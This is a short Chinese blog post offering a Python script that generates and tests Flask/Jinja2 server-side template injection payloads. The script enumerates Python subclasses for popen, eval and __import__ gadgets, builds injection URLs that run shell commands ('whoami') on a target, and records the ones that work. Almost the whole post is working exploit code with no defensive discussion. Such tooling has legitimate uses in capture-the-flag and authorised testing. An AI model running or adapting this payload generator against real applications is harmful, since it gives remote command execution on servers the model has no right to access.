标签:__ scan Python list __.__ Flask SSTI url import
抛开代码丑不谈,用起来还是挺好用滴。
from flask import Flask, request
from jinja2 import Template
from threading import Thread
import requests
import os
import sys
url_dict = {
"popen": [],
"eval": [],
"__import__": [],
}
scan_list = {
"popen": ("__init__.__globals__", "['popen']('whoami').read()"),
"eval": ("__init__.__globals__['__builtins__']", "['eval'](\"__import__('os').popen('whoami').read()\")"),
"__import__": ("__init__.__globals__['__builtins__']", "['__import__']('os').system('whoami')")
}
site = "http://127.0.0.1:5000/waewe?404_url="
def scan():
num = 0
for item in "".__class__.__mro__[-1].__subclasses__():
try:
for ii in scan_list:
if ii in eval("item." + scan_list[ii][0]):
url = "%s{{{}.__class__.__base__.__subclasses__()[%s].%s%s}}\n" % (
site,
num,
scan_list[ii][0],
scan_list[ii][1]
)
url_dict[ii].append(url)
num += 1
except:
num += 1
def check_active(url):
with open("result.txt", "a", encoding="utf-8") as f:
for i in url:
status_code = requests.get(i).status_code
if not status_code >= 500:
f.write(i)
f.close()
if __name__ == '__main__':
scan()
if os.path.exists("result.txt"):
os.remove("result.txt")
t_list = []
for i in url_dict:
t = Thread(target=check_active, args=(url_dict[i],))
t.start()
t_list.append(t)
for t in t_list:
t.join()
print("创建完成,请查看当前路径下的 result.txt 文件!!")
标签:__,
scan,
Python,
list,
__.__,
Flask,
SSTI,
url,
import
From: https://blog.51cto.com/u_14892047/8741608